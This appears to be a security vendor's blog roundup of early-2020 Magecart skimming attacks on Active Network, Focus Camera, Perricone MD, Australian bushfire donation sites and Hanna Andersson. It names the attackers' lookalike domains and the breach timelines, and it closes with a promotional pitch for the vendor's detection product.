New Year Magecart Attacks include Australian Bushfire Donation Sites

Here’s the latest news on Magecart and other website attacks! We’ve trawled the web for the latest news of data breaches, including updates on previous attacks with insights from our own Security Research Team.

Latest Attacks:

  • Active Network
  • Focus Camera
  • Perricone MD
  • Australian Bushfire Donation Sites
  • Hanna Andersson

Active Network

The first reported Magecart attack of 2020 was an attack on school management software provider Active Network. ZDNet revealed hackers had gained access to Blue Bear, a school management platform that handles school accounting and online stores. Parents who paid school fees or bought via the online stores had their credit card details stolen. The attack was active over 6 weeks from October 1st, 2019 and November 13th, 2019. 

In a Notice of Data Breach sent to parents, Active Network explains; “We recently identified suspicious activity on the Blue Bear platform.” Going on to say; “We take this matter very seriously. As soon as we identified the suspicious activity, our counsel engaged a leading cybersecurity firm to investigate the incident and took steps to enhance its monitoring tools and security controls.”

Active Network are offering free identity monitoring to affected customers. However, a Tulsa-based law firm is currently investigating the breach and hope to file a class-action lawsuit against Active Network.

Focus Camera

On January 7th, Bleeping Computer reported an attack on photography retailer Focus Camera. The specific attack dates are unknown however customers who shopped on the site late December until January may have had their personal and financial details stolen.

The malicious domain (zdsassets.com) was registered on November 11th, 2019 in the Netherlands. The domain is difficult to spot in comparison to the legitimate ZenDesk domain (zdassets.com). 

The attack was discovered by Security Researcher Mounir Hahad. Upon researching attacks, Hahad discovered the attacker modified a JavaScript file to inject an obfuscated payload, encoded using base64. The DNS telemetry data seen by Hahad revealed the command and control domain receiving information belonging to Focus Camera customers was resolved 905 times since its creation. This could indicate the number of affected users. However, as Hahad explains, the same domain may have been used across multiple sites. As of January 6th, the malicious code is no longer active on the site.

Perricone MD

In a recent blog post, RapidSpike Security Researcher explains how we discovered multiple attacks on science-based skincare brand, Perricone MD. The attack affected perriconemd.co.uk, perriconemd.it and perriconemd.de. The two hacking groups involved were able to insert malicious code directly into the websites, it is suspected that this was due to a vulnerability in the Magento platform running the websites:

The two attacks present on Perricone MD’s site

The first hack can be traced back to November 2018, after debugging the code it revealed the script was attempting to load a skimmer, however, a mistake in the code caused an error stopping the skimmer from successfully loading. 

The second hacking group gained access to the websites a year later in November 2019, likely through the same vulnerability. They registered an imitating domain, perriconemd.me.uk to go undetected and only loaded the skimmer on the checkout page. The server hosting perriconemd.me.uk (124.156.210.169) is located in Japan and hosts several other domains linked to a wide range of data breaches and credit card theft (full list available here). 

Despite numerous attempts being made to contact the company, no one acknowledged the attack on the site. The code was finally removed on 11th January. 

Australian Bushfire Donation Sites

In an attack displaying how quickly these attackers work, on January 10th it was revealed that sites raising donations for the Australian bushfires had been compromised. Bleeping Computer explain; “When a visitor of the site adds an item to their cart, such as a donation, a malicious credit-card skimmer script named ATMZOW will be loaded into the checkout pages. When a user submits their payment information as part of the checkout process, the malicious script will steal the submitted information and send it to the vamberlo[.]com domain. This domain is obfuscated in the script.” 

Donation page with the ATMZOW skimmer (Credit: Bleeping Computer)

Jérôme Segura discovered the attack and was able to get the vamberlo[.]com shut down, stopping the skimmer. This being said, as the site is still comprised it is open to reinfection. Security Researcher Troy Mursch used the PublicWWW tool and discovered this same script is currently active on 39 other web sites.

It is currently unknown how many donors this affected or how long the script was active on the site however since the bushfires started late December. This script could have been active for weeks.

Hanna Andersson

On January 20th, Bleeping Computer revealed that the popular US children’s apparel retailer, Hanna Anderson had disclosed an attack on their website. The website was hacked and malicious code was injected to steal payment details from the checkout pages. It was confirmed that the compromised date could be as early as September 15th, 2019. 

In an email to customers on January 15th, Hanna Anderson stated: “On December 5th, 2019, law enforcement informed Hanna Andersson that credit cards used on its website were available for purchase on a dark web site.” They go on to explain how the attack took place; “Third-party ecommerce platform, Salesforce Commerce Cloud, was infected with malware that may have scraped information entered by customers into the platform during the purchase process.” Hanna Andersson could not confirm which customers paid through Salesforce Commerce Cloud and therefore contacted all customers who purchased through the site in the infection period. 

In a Notice of Security Incident sent to customers, Hanna Anderson explained that they have “taken steps to re-secure the online purchasing platform.” In addition, Hanna Andersson are offering identity protection services and a $1,000,000 insurance reimbursement policy to customers. The malware was removed on November 11th, 2019.  

This is not an uncommon third-party attack, with the recent attack on Sweaty Betty also being compromised via the same third-party (previously known as Demandware). According to BuiltWith, the Salesforce Commerce Cloud platform is currently used by over 2,800 currently live websites.

RapidSpike security researchers have taken the time to investigate all Magecart attacks mentioned. We can confidently say our Magecart Detection would have detected every attack. Magecart detection takes less than 5 minutes to set-up and will alert you to any untrusted data on your ecommerce site.

Worried about being attacked? Detect website skimming, formjacking and supply chain attacks. Easily protect against unauthorised changes to your critical JavaScript files with RapidSpike Magecart Detection.

Other Security News: